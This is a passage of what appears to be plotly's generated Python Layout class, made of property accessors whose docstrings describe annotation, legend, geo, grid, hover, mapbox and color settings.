the plot that may be behind the annotation. By
default `captureevents` is False unless
`hovertext` is provided. If you use the event
`plotly_clickannotation` without `hovertext`
you must explicitly enable `captureevents`.
clicktoshow
Makes this annotation respond to clicks on the
plot. If you click a data point that exactly
matches the `x` and `y` values of this
annotation, and it is hidden (visible: false),
it will appear. In "onoff" mode, you must click
the same point again to make it disappear, so
if you click multiple points, you can show
multiple annotations. In "onout" mode, a click
anywhere else in the plot (on another data
point or not) will hide this annotation. If you
need to show/hide this annotation in response
to different `x` or `y` values, you can set
`xclick` and/or `yclick`. This is useful for
example to label the side of a bar. To label
markers though, `standoff` is preferred over
`xclick` and `yclick`.
font
Sets the annotation text font.
height
Sets an explicit height for the text box. null
(default) lets the text set the box height.
Taller text will be clipped.
hoverlabel
plotly.graph_objs.layout.annotation.Hoverlabel
instance or dict with compatible properties
hovertext
Sets text to appear when hovering over this
annotation. If omitted or blank, no hover label
will appear.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the annotation (text +
arrow).
showarrow
Determines whether or not the annotation is
drawn with an arrow. If True, `text` is placed
near the arrow's tail. If False, `text` lines
up with the `x` and `y` provided.
standoff
Sets a distance, in pixels, to move the end
arrowhead away from the position it is pointing
at, for example to point at the edge of a
marker independent of zoom. Note that this
shortens the arrow from the `ax` / `ay` vector,
in contrast to `xshift` / `yshift` which moves
everything by this amount.
startarrowhead
Sets the start annotation arrow head style.
startarrowsize
Sets the size of the start annotation arrow
head, relative to `arrowwidth`. A value of 1
(default) gives a head about 3x as wide as the
line.
startstandoff
Sets a distance, in pixels, to move the start
arrowhead away from the position it is pointing
at, for example to point at the edge of a
marker independent of zoom. Note that this
shortens the arrow from the `ax` / `ay` vector,
in contrast to `xshift` / `yshift` which moves
everything by this amount.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
text
Sets the text associated with this annotation.
Plotly uses a subset of HTML tags to do things
like newline (<br>), bold (<b></b>), italics
(<i></i>), hyperlinks (<a href='...'></a>).
Tags <em>, <sup>, <sub> <span> are also
supported.
textangle
Sets the angle at which the `text` is drawn
with respect to the horizontal.
valign
Sets the vertical alignment of the `text`
within the box. Has an effect only if an
explicit height is set to override the text
height.
visible
Determines whether or not this annotation is
visible.
width
Sets an explicit width for the text box. null
(default) lets the text set the box width.
Wider text will be clipped. There is no
automatic wrapping; use <br> to start a new
line.
x
Sets the annotation's x position. If the axis
`type` is "log", then you must take the log of
your desired range. If the axis `type` is
"date", it should be date strings, like date
data, though Date objects and unix milliseconds
will be accepted and converted to strings. If
the axis `type` is "category", it should be
numbers, using the scale where each category is
assigned a serial number from zero in the order
it appears.
xanchor
Sets the text box's horizontal position anchor
This anchor binds the `x` position to the
"left", "center" or "right" of the annotation.
For example, if `x` is set to 1, `xref` to
"paper" and `xanchor` to "right" then the
right-most portion of the annotation lines up
with the right-most edge of the plotting area.
If "auto", the anchor is equivalent to "center"
for data-referenced annotations or if there is
an arrow, whereas for paper-referenced with no
arrow, the anchor picked corresponds to the
closest side.
xclick
Toggle this annotation when clicking a data
point whose `x` value is `xclick` rather than
the annotation's `x` value.
xref
Sets the annotation's x coordinate axis. If set
to an x axis id (e.g. "x" or "x2"), the `x`
position refers to an x coordinate If set to
"paper", the `x` position refers to the
distance from the left side of the plotting
area in normalized coordinates where 0 (1)
corresponds to the left (right) side.
xshift
Shifts the position of the whole annotation and
arrow to the right (positive) or left
(negative) by this many pixels.
y
Sets the annotation's y position. If the axis
`type` is "log", then you must take the log of
your desired range. If the axis `type` is
"date", it should be date strings, like date
data, though Date objects and unix milliseconds
will be accepted and converted to strings. If
the axis `type` is "category", it should be
numbers, using the scale where each category is
assigned a serial number from zero in the order
it appears.
yanchor
Sets the text box's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the annotation.
For example, if `y` is set to 1, `yref` to
"paper" and `yanchor` to "top" then the top-
most portion of the annotation lines up with
the top-most edge of the plotting area. If
"auto", the anchor is equivalent to "middle"
for data-referenced annotations or if there is
an arrow, whereas for paper-referenced with no
arrow, the anchor picked corresponds to the
closest side.
yclick
Toggle this annotation when clicking a data
point whose `y` value is `yclick` rather than
the annotation's `y` value.
yref
Sets the annotation's y coordinate axis. If set
to an y axis id (e.g. "y" or "y2"), the `y`
position refers to an y coordinate If set to
"paper", the `y` position refers to the
distance from the bottom of the plotting area
in normalized coordinates where 0 (1)
corresponds to the bottom (top).
yshift
Shifts the position of the whole annotation and
arrow up (positive) or down (negative) by this
many pixels.
Returns
-------
tuple[plotly.graph_objs.layout.Annotation]
"""
return self['annotations']
@annotations.setter
def annotations(self, val):
self['annotations'] = val
# annotationdefaults
# ------------------
@property
def annotationdefaults(self):
"""
When used in a template (as
layout.template.layout.annotationdefaults), sets the default
property values to use for elements of layout.annotations
The 'annotationdefaults' property is an instance of Annotation
that may be specified as:
- An instance of plotly.graph_objs.layout.Annotation
- A dict of string/value properties that will be passed
to the Annotation constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Annotation
"""
return self['annotationdefaults']
@annotationdefaults.setter
def annotationdefaults(self, val):
self['annotationdefaults'] = val
# autosize
# --------
@property
def autosize(self):
"""
Determines whether or not a layout width or height that has
been left undefined by the user is initialized on each
relayout. Note that, regardless of this attribute, an undefined
layout width or height is always initialized on the first call
to plot.
The 'autosize' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['autosize']
@autosize.setter
def autosize(self, val):
self['autosize'] = val
# bargap
# ------
@property
def bargap(self):
"""
Sets the gap (in plot fraction) between bars of adjacent
location coordinates.
The 'bargap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['bargap']
@bargap.setter
def bargap(self, val):
self['bargap'] = val
# bargroupgap
# -----------
@property
def bargroupgap(self):
"""
Sets the gap (in plot fraction) between bars of the same
location coordinate.
The 'bargroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['bargroupgap']
@bargroupgap.setter
def bargroupgap(self, val):
self['bargroupgap'] = val
# barmode
# -------
@property
def barmode(self):
"""
Determines how bars at the same location coordinate are
displayed on the graph. With "stack", the bars are stacked on
top of one another With "relative", the bars are stacked on top
of one another, with negative values below the axis, positive
values above With "group", the bars are plotted next to one
another centered around the shared location. With "overlay",
the bars are plotted over one another, you might need to an
"opacity" to see multiple bars.
The 'barmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['stack', 'group', 'overlay', 'relative']
Returns
-------
Any
"""
return self['barmode']
@barmode.setter
def barmode(self, val):
self['barmode'] = val
# barnorm
# -------
@property
def barnorm(self):
"""
Sets the normalization for bar traces on the graph. With
"fraction", the value of each bar is divided by the sum of all
values at that location coordinate. "percent" is the same but
multiplied by 100 to show percentages.
The 'barnorm' property is an enumeration that may be specified as:
- One of the following enumeration values:
['', 'fraction', 'percent']
Returns
-------
Any
"""
return self['barnorm']
@barnorm.setter
def barnorm(self, val):
self['barnorm'] = val
# boxgap
# ------
@property
def boxgap(self):
"""
Sets the gap (in plot fraction) between boxes of adjacent
location coordinates.
The 'boxgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['boxgap']
@boxgap.setter
def boxgap(self, val):
self['boxgap'] = val
# boxgroupgap
# -----------
@property
def boxgroupgap(self):
"""
Sets the gap (in plot fraction) between boxes of the same
location coordinate.
The 'boxgroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['boxgroupgap']
@boxgroupgap.setter
def boxgroupgap(self, val):
self['boxgroupgap'] = val
# boxmode
# -------
@property
def boxmode(self):
"""
Determines how boxes at the same location coordinate are
displayed on the graph. If "group", the boxes are plotted next
to one another centered around the shared location. If
"overlay", the boxes are plotted over one another, you might
need to set "opacity" to see them multiple boxes.
The 'boxmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['group', 'overlay']
Returns
-------
Any
"""
return self['boxmode']
@boxmode.setter
def boxmode(self, val):
self['boxmode'] = val
# calendar
# --------
@property
def calendar(self):
"""
Sets the default calendar system to use for interpreting and
displaying dates throughout the plot.
The 'calendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['gregorian', 'chinese', 'coptic', 'discworld',
'ethiopian', 'hebrew', 'islamic', 'julian', 'mayan',
'nanakshahi', 'nepali', 'persian', 'jalali', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self['calendar']
@calendar.setter
def calendar(self, val):
self['calendar'] = val
# clickmode
# ---------
@property
def clickmode(self):
"""
Determines the mode of single click interactions. "event" is
the default value and emits the `plotly_click` event. In
addition this mode emits the `plotly_selected` event in drag
modes "lasso" and "select", but with no event data attached
(kept for compatibility reasons). The "select" flag enables
selecting single data points via click. This mode also supports
persistent selections, meaning that pressing Shift while
clicking, adds to / subtracts from an existing selection.
"select" with `hovermode`: "x" can be confusing, consider
explicitly setting `hovermode`: "closest" when using this
feature. Selection events are sent accordingly as long as
"event" flag is set as well. When the "event" flag is missing,
`plotly_click` and `plotly_selected` events are not fired.
The 'clickmode' property is a flaglist and may be specified
as a string containing:
- Any combination of ['event', 'select'] joined with '+' characters
(e.g. 'event+select')
OR exactly one of ['none'] (e.g. 'none')
Returns
-------
Any
"""
return self['clickmode']
@clickmode.setter
def clickmode(self, val):
self['clickmode'] = val
# colorway
# --------
@property
def colorway(self):
"""
Sets the default trace colors.
The 'colorway' property is a colorlist that may be specified
as a tuple, list, one-dimensional numpy array, or pandas Series of valid
color strings
Returns
-------
list
"""
return self['colorway']
@colorway.setter
def colorway(self, val):
self['colorway'] = val
# datarevision
# ------------
@property
def datarevision(self):
"""
If provided, a changed value tells `Plotly.react` that one or
more data arrays has changed. This way you can modify arrays
in-place rather than making a complete new copy for an
incremental change. If NOT provided, `Plotly.react` assumes
that data arrays are being treated as immutable, thus any data
array with a different identity from its predecessor contains
new data.
The 'datarevision' property accepts values of any type
Returns
-------
Any
"""
return self['datarevision']
@datarevision.setter
def datarevision(self, val):
self['datarevision'] = val
# direction
# ---------
@property
def direction(self):
"""
Legacy polar charts are deprecated! Please switch to "polar"
subplots. Sets the direction corresponding to positive angles
in legacy polar charts.
The 'direction' property is an enumeration that may be specified as:
- One of the following enumeration values:
['clockwise', 'counterclockwise']
Returns
-------
Any
"""
return self['direction']
@direction.setter
def direction(self, val):
self['direction'] = val
# dragmode
# --------
@property
def dragmode(self):
"""
Determines the mode of drag interactions. "select" and "lasso"
apply only to scatter traces with markers or text. "orbit" and
"turntable" apply only to 3D scenes.
The 'dragmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['zoom', 'pan', 'select', 'lasso', 'orbit', 'turntable']
Returns
-------
Any
"""
return self['dragmode']
@dragmode.setter
def dragmode(self, val):
self['dragmode'] = val
# extendpiecolors
# ---------------
@property
def extendpiecolors(self):
"""
If `true`, the pie slice colors (whether given by `piecolorway`
or inherited from `colorway`) will be extended to three times
its original length by first repeating every color 20% lighter
then each color 20% darker. This is intended to reduce the
likelihood of reusing the same color when you have many slices,
but you can set `false` to disable. Colors provided in the
trace, using `marker.colors`, are never extended.
The 'extendpiecolors' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['extendpiecolors']
@extendpiecolors.setter
def extendpiecolors(self, val):
self['extendpiecolors'] = val
# font
# ----
@property
def font(self):
"""
Sets the global font. Note that fonts used in traces and other
layout components inherit from the global font.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.layout.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.layout.Font
"""
return self['font']
@font.setter
def font(self, val):
self['font'] = val
# geo
# ---
@property
def geo(self):
"""
The 'geo' property is an instance of Geo
that may be specified as:
- An instance of plotly.graph_objs.layout.Geo
- A dict of string/value properties that will be passed
to the Geo constructor
Supported dict properties:
bgcolor
Set the background color of the map
center
plotly.graph_objs.layout.geo.Center instance or
dict with compatible properties
coastlinecolor
Sets the coastline color.
coastlinewidth
Sets the coastline stroke width (in px).
countrycolor
Sets line color of the country boundaries.
countrywidth
Sets line width (in px) of the country
boundaries.
domain
plotly.graph_objs.layout.geo.Domain instance or
dict with compatible properties
framecolor
Sets the color the frame.
framewidth
Sets the stroke width (in px) of the frame.
lakecolor
Sets the color of the lakes.
landcolor
Sets the land mass color.
lataxis
plotly.graph_objs.layout.geo.Lataxis instance
or dict with compatible properties
lonaxis
plotly.graph_objs.layout.geo.Lonaxis instance
or dict with compatible properties
oceancolor
Sets the ocean color
projection
plotly.graph_objs.layout.geo.Projection
instance or dict with compatible properties
resolution
Sets the resolution of the base layers. The
values have units of km/mm e.g. 110 corresponds
to a scale ratio of 1:110,000,000.
rivercolor
Sets color of the rivers.
riverwidth
Sets the stroke width (in px) of the rivers.
scope
Set the scope of the map.
showcoastlines
Sets whether or not the coastlines are drawn.
showcountries
Sets whether or not country boundaries are
drawn.
showframe
Sets whether or not a frame is drawn around the
map.
showlakes
Sets whether or not lakes are drawn.
showland
Sets whether or not land masses are filled in
color.
showocean
Sets whether or not oceans are filled in color.
showrivers
Sets whether or not rivers are drawn.
showsubunits
Sets whether or not boundaries of subunits
within countries (e.g. states, provinces) are
drawn.
subunitcolor
Sets the color of the subunits boundaries.
subunitwidth
Sets the stroke width (in px) of the subunits
boundaries.
Returns
-------
plotly.graph_objs.layout.Geo
"""
return self['geo']
@geo.setter
def geo(self, val):
self['geo'] = val
# grid
# ----
@property
def grid(self):
"""
The 'grid' property is an instance of Grid
that may be specified as:
- An instance of plotly.graph_objs.layout.Grid
- A dict of string/value properties that will be passed
to the Grid constructor
Supported dict properties:
columns
The number of columns in the grid. If you
provide a 2D `subplots` array, the length of
its longest row is used as the default. If you
give an `xaxes` array, its length is used as
the default. But it's also possible to have a
different length, if you want to leave a row at
the end for non-cartesian subplots.
domain
plotly.graph_objs.layout.grid.Domain instance
or dict with compatible properties
pattern
If no `subplots`, `xaxes`, or `yaxes` are given
but we do have `rows` and `columns`, we can
generate defaults using consecutive axis IDs,
in two ways: "coupled" gives one x axis per
column and one y axis per row. "independent"
uses a new xy pair for each cell, left-to-right
across each row then iterating rows according
to `roworder`.
roworder
Is the first row the top or the bottom? Note
that columns are always enumerated from left to
right.
rows
The number of rows in the grid. If you provide
a 2D `subplots` array or a `yaxes` array, its
length is used as the default. But it's also
possible to have a different length, if you
want to leave a row at the end for non-
cartesian subplots.
subplots
Used for freeform grids, where some axes may be
shared across subplots but others are not. Each
entry should be a cartesian subplot id, like
"xy" or "x3y2", or "" to leave that cell empty.
You may reuse x axes within the same column,
and y axes within the same row. Non-cartesian
subplots and traces that support `domain` can
place themselves in this grid separately using
the `gridcell` attribute.
xaxes
Used with `yaxes` when the x and y axes are
shared across columns and rows. Each entry
should be an x axis id like "x", "x2", etc., or
"" to not put an x axis in that column. Entries
other than "" must be unique. Ignored if
`subplots` is present. If missing but `yaxes`
is present, will generate consecutive IDs.
xgap
Horizontal space between grid cells, expressed
as a fraction of the total width available to
one cell. Defaults to 0.1 for coupled-axes
grids and 0.2 for independent grids.
xside
Sets where the x axis labels and titles go.
"bottom" means the very bottom of the grid.
"bottom plot" is the lowest plot that each x
axis is used in. "top" and "top plot" are
similar.
yaxes
Used with `yaxes` when the x and y axes are
shared across columns and rows. Each entry
should be an y axis id like "y", "y2", etc., or
"" to not put a y axis in that row. Entries
other than "" must be unique. Ignored if
`subplots` is present. If missing but `xaxes`
is present, will generate consecutive IDs.
ygap
Vertical space between grid cells, expressed as
a fraction of the total height available to one
cell. Defaults to 0.1 for coupled-axes grids
and 0.3 for independent grids.
yside
Sets where the y axis labels and titles go.
"left" means the very left edge of the grid.
*left plot* is the leftmost plot that each y
axis is used in. "right" and *right plot* are
similar.
Returns
-------
plotly.graph_objs.layout.Grid
"""
return self['grid']
@grid.setter
def grid(self, val):
self['grid'] = val
# height
# ------
@property
def height(self):
"""
Sets the plot's height (in px).
The 'height' property is a number and may be specified as:
- An int or float in the interval [10, inf]
Returns
-------
int|float
"""
return self['height']
@height.setter
def height(self, val):
self['height'] = val
# hiddenlabels
# ------------
@property
def hiddenlabels(self):
"""
The 'hiddenlabels' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['hiddenlabels']
@hiddenlabels.setter
def hiddenlabels(self, val):
self['hiddenlabels'] = val
# hiddenlabelssrc
# ---------------
@property
def hiddenlabelssrc(self):
"""
Sets the source reference on plot.ly for hiddenlabels .
The 'hiddenlabelssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['hiddenlabelssrc']
@hiddenlabelssrc.setter
def hiddenlabelssrc(self, val):
self['hiddenlabelssrc'] = val
# hidesources
# -----------
@property
def hidesources(self):
"""
Determines whether or not a text link citing the data source is
placed at the bottom-right cored of the figure. Has only an
effect only on graphs that have been generated via forked
graphs from the plotly service (at https://plot.ly or on-
premise).
The 'hidesources' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['hidesources']
@hidesources.setter
def hidesources(self, val):
self['hidesources'] = val
# hoverdistance
# -------------
@property
def hoverdistance(self):
"""
Sets the default distance (in pixels) to look for data to add
hover labels (-1 means no cutoff, 0 means no looking for data).
This is only a real distance for hovering on point-like
objects, like scatter points. For area-like objects (bars,
scatter fills, etc) hovering is on inside the area and off
outside, but these objects will not supersede hover on point-
like objects in case of conflict.
The 'hoverdistance' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
Returns
-------
int
"""
return self['hoverdistance']
@hoverdistance.setter
def hoverdistance(self, val):
self['hoverdistance'] = val
# hoverlabel
# ----------
@property
def hoverlabel(self):
"""
The 'hoverlabel' property is an instance of Hoverlabel
that may be specified as:
- An instance of plotly.graph_objs.layout.Hoverlabel
- A dict of string/value properties that will be passed
to the Hoverlabel constructor
Supported dict properties:
bgcolor
Sets the background color of all hover labels
on graph
bordercolor
Sets the border color of all hover labels on
graph.
font
Sets the default hover label font used by all
traces on the graph.
namelength
Sets the default length (in number of
characters) of the trace name in the hover
labels for all traces. -1 shows the whole name
regardless of length. 0-3 shows the first 0-3
characters, and an integer >3 will show the
whole name if it is less than that many
characters, but if it is longer, will truncate
to `namelength - 3` characters and add an
ellipsis.
Returns
-------
plotly.graph_objs.layout.Hoverlabel
"""
return self['hoverlabel']
@hoverlabel.setter
def hoverlabel(self, val):
self['hoverlabel'] = val
# hovermode
# ---------
@property
def hovermode(self):
"""
Determines the mode of hover interactions. If `clickmode`
includes the "select" flag, `hovermode` defaults to "closest".
If `clickmode` lacks the "select" flag, it defaults to "x" or
"y" (depending on the trace's `orientation` value) for plots
based on cartesian coordinates. For anything else the default
value is "closest".
The 'hovermode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['x', 'y', 'closest', False]
Returns
-------
Any
"""
return self['hovermode']
@hovermode.setter
def hovermode(self, val):
self['hovermode'] = val
# images
# ------
@property
def images(self):
"""
The 'images' property is a tuple of instances of
Image that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Image
- A list or tuple of dicts of string/value properties that
will be passed to the Image constructor
Supported dict properties:
layer
Specifies whether images are drawn below or
above traces. When `xref` and `yref` are both
set to `paper`, image is drawn below the entire
plot area.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the image.
sizex
Sets the image container size horizontally. The
image will be sized based on the `position`
value. When `xref` is set to `paper`, units are
sized relative to the plot width.
sizey
Sets the image container size vertically. The
image will be sized based on the `position`
value. When `yref` is set to `paper`, units are
sized relative to the plot height.
sizing
Specifies which dimension of the image to
constrain.
source
Specifies the URL of the image to be used. The
URL must be accessible from the domain where
the plot code is run, and can be either
relative or absolute.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
visible
Determines whether or not this image is
visible.
x
Sets the image's x position. When `xref` is set
to `paper`, units are sized relative to the
plot height. See `xref` for more info
xanchor
Sets the anchor for the x position
xref
Sets the images's x coordinate axis. If set to
a x axis id (e.g. "x" or "x2"), the `x`
position refers to an x data coordinate If set
to "paper", the `x` position refers to the
distance from the left of plot in normalized
coordinates where 0 (1) corresponds to the left
(right).
y
Sets the image's y position. When `yref` is set
to `paper`, units are sized relative to the
plot height. See `yref` for more info
yanchor
Sets the anchor for the y position.
yref
Sets the images's y coordinate axis. If set to
a y axis id (e.g. "y" or "y2"), the `y`
position refers to a y data coordinate. If set
to "paper", the `y` position refers to the
distance from the bottom of the plot in
normalized coordinates where 0 (1) corresponds
to the bottom (top).
Returns
-------
tuple[plotly.graph_objs.layout.Image]
"""
return self['images']
@images.setter
def images(self, val):
self['images'] = val
# imagedefaults
# -------------
@property
def imagedefaults(self):
"""
When used in a template (as
layout.template.layout.imagedefaults), sets the default
property values to use for elements of layout.images
The 'imagedefaults' property is an instance of Image
that may be specified as:
- An instance of plotly.graph_objs.layout.Image
- A dict of string/value properties that will be passed
to the Image constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Image
"""
return self['imagedefaults']
@imagedefaults.setter
def imagedefaults(self, val):
self['imagedefaults'] = val
# legend
# ------
@property
def legend(self):
"""
The 'legend' property is an instance of Legend
that may be specified as:
- An instance of plotly.graph_objs.layout.Legend
- A dict of string/value properties that will be passed
to the Legend constructor
Supported dict properties:
bgcolor
Sets the legend background color.
bordercolor
Sets the color of the border enclosing the
legend.
borderwidth
Sets the width (in px) of the border enclosing
the legend.
font
Sets the font used to text the legend items.
orientation
Sets the orientation of the legend.
tracegroupgap
Sets the amount of vertical space (in px)
between legend groups.
traceorder
Determines the order at which the legend items
are displayed. If "normal", the items are
displayed top-to-bottom in the same order as
the input data. If "reversed", the items are
displayed in the opposite order as "normal". If
"grouped", the items are displayed in groups
(when a trace `legendgroup` is provided). if
"grouped+reversed", the items are displayed in
the opposite order as "grouped".
x
Sets the x position (in normalized coordinates)
of the legend.
xanchor
Sets the legend's horizontal position anchor.
This anchor binds the `x` position to the
"left", "center" or "right" of the legend.
y
Sets the y position (in normalized coordinates)
of the legend.
yanchor
Sets the legend's vertical position anchor This
anchor binds the `y` position to the "top",
"middle" or "bottom" of the legend.
Returns
-------
plotly.graph_objs.layout.Legend
"""
return self['legend']
@legend.setter
def legend(self, val):
self['legend'] = val
# mapbox
# ------
@property
def mapbox(self):
"""
The 'mapbox' property is an instance of Mapbox
that may be specified as:
- An instance of plotly.graph_objs.layout.Mapbox
- A dict of string/value properties that will be passed
to the Mapbox constructor
Supported dict properties:
accesstoken
Sets the mapbox access token to be used for
this mapbox map. Alternatively, the mapbox
access token can be set in the configuration
options under `mapboxAccessToken`.
bearing
Sets the bearing angle of the map (in degrees
counter-clockwise from North).
center
plotly.graph_objs.layout.mapbox.Center instance
or dict with compatible properties
domain
plotly.graph_objs.layout.mapbox.Domain instance
or dict with compatible properties
layers
plotly.graph_objs.layout.mapbox.Layer instance
or dict with compatible properties
layerdefaults
When used in a template (as
layout.template.layout.mapbox.layerdefaults),
sets the default property values to use for
elements of layout.mapbox.layers
pitch
Sets the pitch angle of the map (in degrees,
where 0 means perpendicular to the surface of
the map).
style
Sets the Mapbox map style. Either input one of
the default Mapbox style names or the URL to a
custom style or a valid Mapbox style JSON.
zoom
Sets the zoom level of the map.
Returns
-------
plotly.graph_objs.layout.Mapbox
"""
return self['mapbox']
@mapbox.setter
def mapbox(self, val):
self['mapbox'] = val
# margin
# ------
@property
def margin(self):
"""
The 'margin' property is an instance of Margin
that may be specified as:
- An instance of plotly.graph_objs.layout.Margin
- A dict of string/value properties that will be passed
to the Margin constructor
Supported dict properties:
autoexpand
b
Sets the bottom margin (in px).
l
Sets the left margin (in px).
pad
Sets the amount of padding (in px) between the
plotting area and the axis lines
r
Sets the right margin (in px).
t
Sets the top margin (in px).
Returns
-------
plotly.graph_objs.layout.Margin
"""
return self['margin']
@margin.setter
def margin(self, val):
self['margin'] = val
# modebar
# -------
@property
def modebar(self):
"""
The 'modebar' property is an instance of Modebar
that may be specified as:
- An instance of plotly.graph_objs.layout.Modebar
- A dict of string/value properties that will be passed
to the Modebar constructor
Supported dict properties:
activecolor
Sets the color of the active or hovered on
icons in the modebar.
bgcolor
Sets the background color of the modebar.
color
Sets the color of the icons in the modebar.
orientation
Sets the orientation of the modebar.
Returns
-------
plotly.graph_objs.layout.Modebar
"""
return self['modebar']
@modebar.setter
def modebar(self, val):
self['modebar'] = val
# orientation
# -----------
@property
def orientation(self):
"""
Legacy polar charts are deprecated! Please switch to "polar"
subplots. Rotates the entire polar by the given angle in legacy
polar charts.
The 'orientation' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self['orientation']
@orientation.setter
def orientation(self, val):
self['orientation'] = val
# paper_bgcolor
# -------------
@property
def paper_bgcolor(self):
"""
Sets the color of paper where the graph is drawn.
The 'paper_bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['paper_bgcolor']
@paper_bgcolor.setter
def paper_bgcolor(self, val):
self['paper_bgcolor'] = val
# piecolorway
# -----------
@property
def piecolorway(self):
"""
Sets the default pie slice colors. Defaults to the main
`colorway` used for trace colors. If you specify a new list
here it can still be extended with lighter and darker colors,
see `extendpiecolors`.
The 'piecolorway' property is a colorlist that may be specified
as a tuple, list, one-dimensional numpy array, or pandas Series of valid
color strings
Returns
-------
list
"""
return self['piecolorway']
@piecolorway.setter
def piecolorway(self, val):
self['piecolorway'] = val
# plot_bgcolor
# ------------
@property
def plot_bgcolor(self):
"""
Sets the color of plotting area in-between x and y axes.
The 'plot_bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
